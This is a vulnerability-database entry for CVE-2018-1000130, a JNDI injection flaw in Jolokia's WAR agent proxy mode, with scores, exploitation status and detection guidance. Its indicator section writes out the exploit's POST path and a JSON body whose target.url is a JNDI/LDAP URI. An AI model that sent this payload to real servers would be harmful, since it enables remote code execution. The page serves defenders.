cbcvebase.
CVE-2018-1000130
published 2018-03-14

CVE-2018-1000130: A JNDI Injection vulnerability exists in Jolokia agent version 1.3.7 in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.

PriorityP183high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
73.57%
99.4th percentile
A JNDI Injection vulnerability exists in Jolokia agent version 1.3.7 in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.

Affected

1 ranges
VendorProductVersion rangeFixed in
jolokiawebarchive_agent

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /jolokia/read/getDiagnosticOptions HTTP/1.1
path/jolokia/read/getDiagnosticOptions
command{"type":"read","mbean":"java.lang:type=Memory","target":{"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"}}
port1389
  • Response body contains JNDI/LDAP connection failure string indicating the proxy mode JNDI injection attempt was processed by the server — match on 'Failed to retrieve RMIServer stub: javax.naming.CommunicationException' with the attacker-controlled host:port to confirm vulnerability.
  • Exploitation requires the Jolokia WAR agent specifically; the JVM agent is not affected. Scope detection to WAR deployments with proxy mode enabled.
  • Exploit payload is delivered as a JSON POST body to the Jolokia endpoint with a 'target.url' field containing an attacker-controlled JNDI/LDAP URI (service:jmx:rmi:///jndi/ldap://...). Monitor for outbound LDAP connections originating from the JVM process.
  • HTTP request Content-Type is application/x-www-form-urlencoded while the body is JSON — an anomalous combination that can be used as an additional detection signal for this specific exploit template.
  • ·Vulnerability only applies when Jolokia is running in proxy mode. The WAR agent has proxy mode enabled by default; the JVM agent does not support proxy mode and is not affected.
  • ·Red Hat OpenStack Platform ships the affected code but proxy mode is not enabled by default in any supported RHOSP configuration, reducing practical exploitability in that environment.
  • ·Affected version is Jolokia agent 1.3.7; the fix (JMX service URL white-listing and corrected WAR agent defaults) was introduced in version 1.5.0.

CVSS provenance

nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
vendor_redhat8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.